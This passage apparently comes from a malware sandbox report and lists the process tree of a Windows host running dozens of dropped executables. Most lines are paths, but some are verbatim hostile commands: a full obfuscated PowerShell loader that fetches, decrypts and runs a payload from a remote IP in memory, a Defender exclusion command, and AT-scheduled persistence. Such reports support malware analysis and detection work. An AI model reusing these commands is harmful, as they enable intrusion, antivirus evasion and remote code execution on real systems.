    C:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 952
    3⤵
    - Program crash
    PID:960
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 1080
    3⤵
    - Program crash
    PID:5184
- C:\Users\Admin\AppData\Local\Temp\Files\martinvnc.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\martinvnc.exe"
  2⤵
  PID:5820
- - C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k
    3⤵
    PID:3164
- C:\Users\Admin\AppData\Local\Temp\Files\FATTHER.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\FATTHER.exe"
  2⤵
  PID:5644
- C:\Users\Admin\AppData\Local\Temp\Files\native.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\native.exe"
  2⤵
  PID:1108
- C:\Users\Admin\AppData\Local\Temp\Files\flt_shovemydiscoupyourarse.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\flt_shovemydiscoupyourarse.exe"
  2⤵
  PID:2760
- C:\Users\Admin\AppData\Local\Temp\Files\RetailerRise.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\RetailerRise.exe"
  2⤵
  PID:2252
- C:\Users\Admin\AppData\Local\Temp\Files\Eszop.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Eszop.exe"
  2⤵
  PID:1680
- C:\Users\Admin\AppData\Local\Temp\Files\riviera_tour_sochi.pdf.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\riviera_tour_sochi.pdf.exe"
  2⤵
  PID:1200
- - C:\Users\Admin\AppData\Roaming\Violator.exe
    C:\Users\Admin\AppData\Roaming\Violator.exe
    3⤵
    PID:8200
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k move Jacob Jacob.bat & Jacob.bat & exit
      4⤵
      PID:9508
- C:\Users\Admin\AppData\Local\Temp\Files\bullpen12.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\bullpen12.exe"
  2⤵
  PID:4132
- C:\Users\Admin\AppData\Local\Temp\Files\MartDrum.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\MartDrum.exe"
  2⤵
  PID:1356
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k cmd < Tunisia & exit
    3⤵
    PID:6876
  - - C:\Windows\SysWOW64\cmd.exe
      cmd
      4⤵
      PID:6884
- C:\Users\Admin\AppData\Local\Temp\Files\niks.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\niks.exe"
  2⤵
  PID:2636
- C:\Users\Admin\AppData\Local\Temp\Files\crypted_69a30000.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\crypted_69a30000.exe"
  2⤵
  PID:2880
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:6864
- C:\Users\Admin\AppData\Local\Temp\Files\kb%5Efr_ouverture.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\kb%5Efr_ouverture.exe"
  2⤵
  PID:4380
- C:\Users\Admin\AppData\Local\Temp\Files\random.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\random.exe"
  2⤵
  PID:2936
- C:\Users\Admin\AppData\Local\Temp\Files\images.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\images.exe"
  2⤵
  PID:3540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /C AT /delete /yes
    3⤵
    PID:2920
  - - C:\Windows\SysWOW64\at.exe
      AT /delete /yes
      4⤵
      PID:6008
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /C AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su C:\Windows\system32\RVHOST.exe
    3⤵
    PID:7020
  - - C:\Windows\SysWOW64\at.exe
      AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su C:\Windows\system32\RVHOST.exe
      4⤵
      PID:5236
- C:\Users\Admin\AppData\Local\Temp\Files\sys.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\sys.exe"
  2⤵
  PID:6060
- C:\Users\Admin\AppData\Local\Temp\Files\ce0b953269c74bc.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ce0b953269c74bc.exe"
  2⤵
  PID:6248
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5264
- C:\Users\Admin\AppData\Local\Temp\Files\gookcom.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\gookcom.exe"
  2⤵
  PID:6428
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $danaAlannah = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $aramisAlannah = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NDE2OTU=')); $sherpasReparel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NTBhNjg=')); $oberonDana = new-object System.Net.Sockets.TcpClient; $oberonDana.Connect($danaAlannah, [int]$aramisAlannah); $alannahArain = $oberonDana.GetStream(); $oberonDana.SendTimeout = 300000; $oberonDana.ReceiveTimeout = 300000; $gliomaArain = [System.Text.StringBuilder]::new(); $gliomaArain.AppendLine('GET /' + $sherpasReparel); $gliomaArain.AppendLine('Host: ' + $danaAlannah); $gliomaArain.AppendLine(); $gliomaAramis = [System.Text.Encoding]::ASCII.GetBytes($gliomaArain.ToString()); $alannahArain.Write($gliomaAramis, 0, $gliomaAramis.Length); $onusArain = New-Object System.IO.MemoryStream; $alannahArain.CopyTo($onusArain); $alannahArain.Dispose(); $oberonDana.Dispose(); $onusArain.Position = 0; $gliomaSowback = $onusArain.ToArray(); $onusArain.Dispose(); $sowbackAlannah = [System.Text.Encoding]::ASCII.GetString($gliomaSowback).IndexOf('`r`n`r`n')+1; $gliomaAlannah = [System.Text.Encoding]::ASCII.GetString($gliomaSowback[$sowbackAlannah..($gliomaSowback.Length-1)]); $gliomaAlannah = [System.Convert]::FromBase64String($gliomaAlannah); $sherpasSowback = New-Object System.Security.Cryptography.AesManaged; $sherpasSowback.Mode = [System.Security.Cryptography.CipherMode]::CBC; $sherpasSowback.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $sherpasSowback.Key = [System.Convert]::FromBase64String('yhw+bQ6dDyupOV1xzuOhL65Top3x+yWenlXd6UEYqAM='); $sherpasSowback.IV = [System.Convert]::FromBase64String('pXmM/4stDHWwo+KOQjpI+A=='); $sherpasAramis = $sherpasSowback.CreateDecryptor(); $gliomaAlannah = $sherpasAramis.TransformFinalBlock($gliomaAlannah, 0, $gliomaAlannah.Length); $sherpasAramis.Dispose(); $sherpasSowback.Dispose(); $alannahSherpas = New-Object System.IO.MemoryStream(, $gliomaAlannah); $aramisSherpas = New-Object System.IO.MemoryStream; $oberonAramis = New-Object System.IO.Compression.GZipStream($alannahSherpas, [IO.Compression.CompressionMode]::Decompress); $oberonAramis.CopyTo($aramisSherpas); $gliomaAlannah = $aramisSherpas.ToArray(); $onusSherpas = [System.Reflection.Assembly]::Load($gliomaAlannah); $aramisArain = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZHJlbnRJb3M=')); $onusGlioma = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('c293YmFja0FyYWlu')); $onusSowback = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b251c0FsYW5uYWg=')); $reparelGlioma = $onusSherpas.GetType($aramisArain + '.' + $onusGlioma); $sherpasOberon = $reparelGlioma.GetMethod($onusSowback); $sherpasOberon.Invoke($alannahSowback, (, [string[]] (''))); #($alannahSowback, $alannahSowback);
    3⤵
    PID:6360
- C:\Users\Admin\AppData\Local\Temp\Files\appdata.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\appdata.exe"
  2⤵
  PID:6528
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:6640
- C:\Users\Admin\AppData\Local\Temp\Files\conan.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\conan.exe"
  2⤵
  PID:6648
- C:\Users\Admin\AppData\Local\Temp\Files\pinguin.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\pinguin.exe"
  2⤵
  PID:7084
- C:\Users\Admin\AppData\Local\Temp\Files\wr.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\wr.exe"
  2⤵
  PID:5736
- - C:\Users\Admin\AppData\Local\Temp\Files\avgrec.exe
    "" ""
    3⤵
    PID:2952
- C:\Users\Admin\AppData\Local\Temp\Files\current.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\current.exe"
  2⤵
  PID:5440
- C:\Users\Admin\AppData\Local\Temp\Files\csaff.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\csaff.exe"
  2⤵
  PID:6280
- - C:\Users\Admin\AppData\Local\SquirrelTemp\Update.exe
    "C:\Users\Admin\AppData\Local\SquirrelTemp\Update.exe" --install .
    3⤵
    PID:6932
  - - C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\CoinSurf.WPF.exe
      "C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\CoinSurf.WPF.exe" --squirrel-firstrun
      4⤵
      PID:6824
    - - C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\csen.exe
        
        "C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\csen.exe" -key=41711975-8b11-4990-994f-e4ec4deba583 -server=212.102.58.164:443 -dns=8.8.8.8:53 -ua=win32#6.2.9200.0#1.0.4-wpf -max_incoming_streams=1000000 -accept_backlog=100000 -ping_backlog=10000 -read_buffer_size=4096 -prod
        5⤵
        
        PID:7724
    - - C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.7\CoinSurf.WPF.exe
        
        "C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.7\CoinSurf.WPF.exe" --squirrel-updated 1.0.7
        5⤵
        
        PID:7020
    - - C:\Users\Admin\AppData\Local\CoinSurf\Update.exe
        
        "C:\Users\Admin\AppData\Local\CoinSurf\Update.exe" --processStartAndWait "CoinSurf.WPF.exe"
        5⤵
        
        PID:7824
      - C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.7\CoinSurf.WPF.exe
        
        "C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.7\CoinSurf.WPF.exe"
        6⤵
        
        PID:8792
        
        C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.7\csen.exe
        
        "C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.7\csen.exe" -key=41711975-8b11-4990-994f-e4ec4deba583 -server=212.102.58.164:443 -dns=8.8.8.8:53 -ua=win32#6.2.9200.0#1.0.7-wpf -max_incoming_streams=1000000 -accept_backlog=100000 -ping_backlog=10000 -read_buffer_size=4096 -prod
        7⤵
        
        PID:10212
  - - C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\csen.exe
      "C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\csen.exe" --squirrel-firstrun
      4⤵
      PID:68
- C:\Users\Admin\AppData\Local\Temp\Files\trust12344.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\trust12344.exe"
  2⤵
  PID:6420
- C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe
  C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe
  2⤵
  PID:348
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\SysWOW64\cmd.exe
    3⤵
    PID:6992
  - - C:\Windows\System32\certutil.exe
      C:\Windows\System32\certutil.exe
      4⤵
      PID:556
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:424
- C:\Users\Admin\AppData\Local\Temp\Files\niceeyestrain.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\niceeyestrain.exe"
  2⤵
  PID:6336
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\whatgoal.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\whatgoal.exe
    3⤵
    PID:5816
- C:\Users\Admin\AppData\Local\Temp\Files\555.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\555.exe"
  2⤵
  PID:6960
- C:\Users\Admin\AppData\Local\Temp\Files\Max.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Max.exe"
  2⤵
  PID:1360
- C:\Users\Admin\AppData\Local\Temp\Files\mk.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\mk.exe"
  2⤵
  PID:6304
- C:\Users\Admin\AppData\Local\Temp\Files\Project_8.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Project_8.exe"
  2⤵
  PID:524
- - C:\Users\Admin\AppData\Local\Temp\648b5vt13485v134322685vt.exe
    "C:\Users\Admin\AppData\Local\Temp\648b5vt13485v134322685vt.exe"
    3⤵
    PID:7112
- C:\Users\Admin\AppData\Local\Temp\Files\mstsc.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\mstsc.exe"
  2⤵
  PID:5152
- - C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
    "C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
    3⤵
    PID:3456
- C:\Users\Admin\AppData\Local\Temp\Files\idrB5Event.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\idrB5Event.exe"
  2⤵
  PID:1232
- C:\Users\Admin\AppData\Local\Temp\Files\Setup2010u32.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Setup2010u32.exe"
  2⤵
  PID:684
- - C:\Users\Admin\AppData\Local\Temp\AITMP0\CleanUp Icons FOP.exe
    "C:\Users\Admin\AppData\Local\Temp\AITMP0\CleanUp Icons FOP.exe" /s %3
    3⤵
    PID:6272
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c mode con:cols=0080 lines=0025
      4⤵
      PID:5724
    - - C:\Windows\SysWOW64\mode.com
        
        mode con:cols=0080 lines=0025
        5⤵
        
        PID:6588
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c title Window Title
      4⤵
      PID:4668
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\afolder" mkdir "C:\Users\Admin\AppData\Local\Temp\afolder"
      4⤵
      PID:700
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\xtmp" mkdir "C:\Users\Admin\AppData\Local\Temp\xtmp"
      4⤵
      PID:1468
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c attrib +h C:\Users\Admin\AppData\Local\Temp\xtmp
      4⤵
      PID:3896
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +h C:\Users\Admin\AppData\Local\Temp\xtmp
        5⤵
        Views/modifies file attributes
        
        PID:7312
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c echo:0>C:\Users\Admin\AppData\Local\Temp\is64.txt
      4⤵
      PID:5440
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\is64.bat
      4⤵
      PID:6236
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp62701.bat" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp62701.bat"
      4⤵
      PID:8680
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp69491.exe" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp69491.exe"
      4⤵
      PID:8736
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Windows\Sysnative\cmd.exe /C C:\Users\Admin\AppData\Local\Temp\xtmp\tmp62701.bat "C:\Users\Admin\AppData\Local\Temp\AITMP0\CleanUp Icons FOP.exe" /s %3
      4⤵
      PID:8872
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C C:\Users\Admin\AppData\Local\Temp\xtmp\tmp62701.bat "C:\Users\Admin\AppData\Local\Temp\AITMP0\CleanUp Icons FOP.exe" /s %3
        5⤵
        
        PID:8676
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp62701.bat" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp62701.bat"
      4⤵
      PID:9064
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp69491.exe" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp69491.exe"
      4⤵
      PID:9984
- C:\Users\Admin\AppData\Local\Temp\Files\crypt.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\crypt.exe"
  2⤵
  PID:3956
- - C:\Windows\SysWOW64\wscript.exe
    "wscript.exe" "C:\Users\Admin\start.vbs"
    3⤵
    PID:4932
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\temp.bat" "
      4⤵
      PID:6704
- C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20ASM.NET.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20ASM.NET.exe"
  2⤵
  PID:2812
- C:\Users\Admin\AppData\Local\Temp\Files\hack1226.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\hack1226.exe"
  2⤵
  PID:6288
- C:\Users\Admin\AppData\Local\Temp\Files\goldqwer12.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\goldqwer12.exe"
  2⤵
  PID:6172
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:9548
- C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"
  2⤵
  PID:6292
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:3960
- C:\Users\Admin\AppData\Local\Temp\Files\Nvokcuobkn.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Nvokcuobkn.exe"
  2⤵
  PID:6180
- C:\Users\Admin\AppData\Local\Temp\Files\ISetup10.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ISetup10.exe"
  2⤵
  PID:1948
- C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe"
  2⤵
  PID:5824
- - C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe"
    3⤵
    PID:7764
- C:\Users\Admin\AppData\Local\Temp\Files\file300un-1.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\file300un-1.exe"
  2⤵
  PID:6228
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
    3⤵
    PID:4768
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
    3⤵
    PID:7236
- C:\Users\Admin\AppData\Local\Temp\Files\1234.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\1234.exe"
  2⤵
  PID:6940
- C:\Users\Admin\AppData\Local\Temp\Files\eeee.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\eeee.exe"
  2⤵
  PID:6564
- C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe"
  2⤵
  PID:6432
- - C:\Users\Admin\AppData\Local\Temp\2748720850.exe
    C:\Users\Admin\AppData\Local\Temp\2748720850.exe
    3⤵
    PID:8332
  - - C:\Users\Admin\AppData\Local\Temp\94898219.exe
      C:\Users\Admin\AppData\Local\Temp\94898219.exe
      4⤵
      PID:8596
    - - C:\Users\Admin\AppData\Local\Temp\143651126.exe
        
        C:\Users\Admin\AppData\Local\Temp\143651126.exe
        5⤵
        
        PID:7608
    - - C:\Users\Admin\AppData\Local\Temp\1167622446.exe
        
        C:\Users\Admin\AppData\Local\Temp\1167622446.exe
        5⤵
        
        PID:9016
  - - C:\Users\Admin\AppData\Local\Temp\3134319200.exe
      C:\Users\Admin\AppData\Local\Temp\3134319200.exe
      4⤵
      PID:7136
  - - C:\Users\Admin\AppData\Local\Temp\2418615800.exe
      C:\Users\Admin\AppData\Local\Temp\2418615800.exe
      4⤵
      PID:3956
  - - C:\Users\Admin\AppData\Local\Temp\84708281.exe
      C:\Users\Admin\AppData\Local\Temp\84708281.exe
      4⤵
      PID:9928
- C:\Users\Admin\AppData\Local\Temp\Files\tidex_-_short_stuff.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\tidex_-_short_stuff.exe"
  2⤵
  PID:5080
- C:\Users\Admin\AppData\Local\Temp\Files\june.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\june.exe"
  2⤵
  PID:4592
- - C:\Users\Admin\AppData\Local\Temp\is-Q20VD.tmp\june.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-Q20VD.tmp\june.tmp" /SL5="$10498,3706563,54272,C:\Users\Admin\AppData\Local\Temp\Files\june.exe"
    3⤵
    PID:7784
  - - C:\Users\Admin\AppData\Local\Sun Vox\sunvox.exe
      "C:\Users\Admin\AppData\Local\Sun Vox\sunvox.exe" -i
      4⤵
      PID:6580
  - - C:\Users\Admin\AppData\Local\Sun Vox\sunvox.exe
      "C:\Users\Admin\AppData\Local\Sun Vox\sunvox.exe" -s
      4⤵
      PID:7644
- C:\Users\Admin\AppData\Local\Temp\Files\asas.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\asas.exe"
  2⤵
  PID:7332
- - C:\Windows\System32\werfault.exe
    \??\C:\Windows\System32\werfault.exe
    3⤵
    PID:7496
- C:\Users\Admin\AppData\Local\Temp\Files\RDX.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\RDX.exe"
  2⤵
  PID:7420
- C:\Users\Admin\AppData\Local\Temp\Files\amadycry.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\amadycry.exe"
  2⤵
  PID:7600
- C:\Users\Admin\AppData\Local\Temp\Files\gate3_64.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\gate3_64.exe"
  2⤵
  PID:7328
- C:\Users\Admin\AppData\Local\Temp\Files\Pparetcoju.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Pparetcoju.exe"
  2⤵
  PID:7428
- C:\Users\Admin\AppData\Local\Temp\Files\HeaderFinder.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\HeaderFinder.exe"
  2⤵
  PID:7552
- C:\Users\Admin\AppData\Local\Temp\Files\syncUpd.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\syncUpd.exe"
  2⤵
  PID:7632
- C:\Users\Admin\AppData\Local\Temp\Files\elevator.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\elevator.exe"
  2⤵
  PID:7852
- C:\Users\Admin\AppData\Local\Temp\Files\goldprime123mm.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\goldprime123mm.exe"
  2⤵
  PID:8004
- C:\Users\Admin\AppData\Local\Temp\Files\first.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\first.exe"
  2⤵
  PID:8112
- C:\Users\Admin\AppData\Local\Temp\Files\DemagogicAlewife.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\DemagogicAlewife.exe"
  2⤵
  PID:5724
- C:\Users\Admin\AppData\Local\Temp\Files\sarra.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\sarra.exe"
  2⤵
  PID:2088
- C:\Users\Admin\AppData\Local\Temp\Files\Akh.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Akh.exe"
  2⤵
  PID:6756
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
    3⤵
    PID:7620
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
    3⤵
    PID:4236
  - - C:\Users\Admin\Pictures\V19HphNQL6XRlWZ7ws8ByGTq.exe
      "C:\Users\Admin\Pictures\V19HphNQL6XRlWZ7ws8ByGTq.exe"
      4⤵
      PID:10228
  - - C:\Users\Admin\Pictures\cRo2QNm6lz5zAXisEpXogVAQ.exe
      "C:\Users\Admin\Pictures\cRo2QNm6lz5zAXisEpXogVAQ.exe"
      4⤵
      PID:3288
  - - C:\Users\Admin\Pictures\RyyBfwDjZvn0KaucXNGMIhy7.exe
      "C:\Users\Admin\Pictures\RyyBfwDjZvn0KaucXNGMIhy7.exe" --silent --allusers=0
      4⤵
      PID:2564
    - - C:\Users\Admin\Pictures\RyyBfwDjZvn0KaucXNGMIhy7.exe
        
        C:\Users\Admin\Pictures\RyyBfwDjZvn0KaucXNGMIhy7.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x2a4,0x2a8,0x2ac,0x280,0x2b0,0x6942e1d0,0x6942e1dc,0x6942e1e8
        5⤵
        
        PID:6964
  - - C:\Users\Admin\Pictures\kbeI6PWO1IR0oXOtIN5w3sjJ.exe
      "C:\Users\Admin\Pictures\kbeI6PWO1IR0oXOtIN5w3sjJ.exe"
      4⤵
      PID:9788
  - - C:\Users\Admin\Pictures\QCjtOJSDtDpZTWk1Og06u8xG.exe
      "C:\Users\Admin\Pictures\QCjtOJSDtDpZTWk1Og06u8xG.exe"
      4⤵
      PID:9496
    - - C:\Users\Admin\AppData\Local\Temp\7zS6F6D.tmp\Install.exe
        
        .\Install.exe /dQndidvBp "385118" /S
        5⤵
        
        PID:9420
  - - C:\Users\Admin\Pictures\qC94BJFLUyNxzwjwfoiwNx3Z.exe
      "C:\Users\Admin\Pictures\qC94BJFLUyNxzwjwfoiwNx3Z.exe"
      4⤵
      PID:10144
    - - C:\Users\Admin\AppData\Local\Temp\7zSE171.tmp\Install.exe
        
        .\Install.exe /dQndidvBp "385118" /S
        5⤵
        
        PID:4508
- C:\Users\Admin\AppData\Local\Temp\Files\loader.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\loader.exe"
  2⤵
  PID:7964
- - C:\Users\Admin\AppData\Local\Temp\rhsgn_protected.exe
    "C:\Users\Admin\AppData\Local\Temp\rhsgn_protected.exe"
    3⤵
    PID:4704
  - - C:\Users\Admin\AppData\Local\Temp\ARA.exe
      "C:\Users\Admin\AppData\Local\Temp\ARA.exe"
      4⤵
      PID:5228
- C:\Users\Admin\AppData\Local\Temp\Files\file.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\file.exe"
  2⤵
  PID:1960
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.vbs"
    3⤵
    PID:6104
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\update.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\update.exe"
      4⤵
      PID:7792
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.exe"
      4⤵
      PID:6736
- C:\Users\Admin\AppData\Local\Temp\Files\lummahelp.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\lummahelp.exe"
  2⤵
  PID:6596
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:2956
- C:\Users\Admin\AppData\Local\Temp\Files\abtc8mhlbehqil.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\abtc8mhlbehqil.exe"
  2⤵
  PID:8020
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    3⤵
    PID:7068
- C:\Users\Admin\AppData\Local\Temp\Files\ISetup2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ISetup2.exe"
  2⤵
  PID:8108
- - C:\Users\Admin\AppData\Local\Temp\u698.0.exe
    "C:\Users\Admin\AppData\Local\Temp\u698.0.exe"
    3⤵
    PID:2548
- - C:\Users\Admin\AppData\Local\Temp\u698.1.exe
